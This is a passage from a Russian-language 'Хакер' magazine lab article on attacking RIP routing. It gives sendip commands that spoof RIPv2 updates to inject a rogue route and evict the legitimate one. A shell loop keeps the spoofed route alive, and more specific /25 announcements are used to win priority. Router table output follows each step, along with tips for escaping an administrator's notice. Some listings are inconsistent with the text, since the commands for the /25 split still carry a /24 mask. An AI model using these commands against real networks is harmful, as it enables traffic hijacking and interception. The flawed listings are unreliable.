лабораторная работа

КОНСТАНТИН ГАВРИЛЕНКО

Спецвыпуск: Хакер, номер #066, стр. 066-018-9

[ЭКСПЕРИМЕНТ (продолжение)]

Листинг 19. Чтобы избежать прерывания сообщения, вводим свой маршрут

arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 2 -rc 2 -re 2:0:192.168.10.0:255.255.255.0:192.168.69.102:1 192.168.69.36

Листинг 20. Измененная таблица маршрутизации на хосте М2

R 192.168.10.0/24 [120/1] via 192.168.69.100, 00:00:15, Ethernet0

[120/1] via 192.168.69.102, 00:00:01, Ethernet0

После добавления своего маршрута можно удалять мешающий легитимный маршрут, для чего посылается пакет, как будто бы пришедший с хоста М1, с более высокой метрикой.

arhontus / # sendip -p ipv4 -is 192.168.69.100 -p udp -us 520 -ud 520 -p rip -rv 2 -rc 2 -re 2:0:192.168.10.0:255.255.255.0:192.168.69.100:2 192.168.66.36

R 192.168.10.0/24 [120/1] via 192.168.69.102, 00:00:22, Ethernet0

Мы поменяли метрику легитимного маршрута на 2, и маршрутизатор автоматически удалил легитимный маршрут, оставив только введенный. При введении метрики маршрута, равной 16, он будет автоматически удален, даже если ему нет альтернативы.

Помни, что по умолчанию оповещения происходят с 30-ти секундным интервалом. И если хочешь, чтобы путь постоянно оставался приоритетным, не забудь оповещать о жизнедеятельности введенного маршрута каждые 30 секунд или чаще.

Листинг 21. Отсылка оповещения в цикле

arhontus / # while :; do sendip <маршрут> ; sleep 30; done

Маршрут, который подвергли удалению, появится в таблице после очередного пакета оповещения, пришедшего с легитимного маршрутизатора, так что можешь включить его удаление в цикл оповещения, если считаешь, что админ часто заходит на маршрутизатор и смотрит таблицу маршрутов. Маршрут, распределенный между двумя маршрутизаторами, имеет гораздо большие шансы привлечь его внимание.

[изменение оповещаемой маски маршрута на более специфичную.] Продолжая изменять тот же маршрут, попробуем разделить его на две подсети: 192.168.10.0/25 и 192.168.10.128/25. Тем самым получим приоритет.

arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 2 -rc 2 -re 2:0:192.168.10.0:255.255.255.0:192.168.69.102:1 192.168.69.36

Листинг 23. Изменение таблицы маршрутизации хоста М2 после первого оповещения

192.168.10.0/24 is variably subnetted, 2 subnets, 2 masks

R 192.168.10.0/25 [120/1] via 192.168.69.102, 00:00:01, Ethernet0

R 192.168.10.0/24 [120/1] via 192.168.69.100, 00:00:24, Ethernet0

Листинг 24. Оповещение о том, что вторая половина бывшего целостного сабнета проходит тоже через нас

arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 2 -rc 2 -re 2:0:192.168.10.0:255.255.255.0:192.168.69.102:1 192.168.69.36

Листинг 25. Изменение таблицы маршрутизации на атакуемой машине

192.168.10.0/24 is variably subnetted, 3 subnets, 2 masks

R 192.168.10.0/25 [120/1] via 192.168.69.102, 00:00:022, Ethernet0

R 192.168.10.0/24 [120/1] via 192.168.69.100, 00:00:16, Ethernet0

R 192.168.10.128/25 [120/1] via 192.168.69.102, 00:00:04, Ethernet0

Не пугайся, что в таблице присутствует 192.168.10.0/24 [120/1] via 192.168.69.100. Через этот хост трафик больше не будет передаваться в подсеть, так как наша маска более специфична, она и выбирается при решении о маршрутизации. Если маска оповещаемого маршрута равна 255.255.255.255, указать более конкретную маску невозможно и придется выбирать другие пути решения проблемы.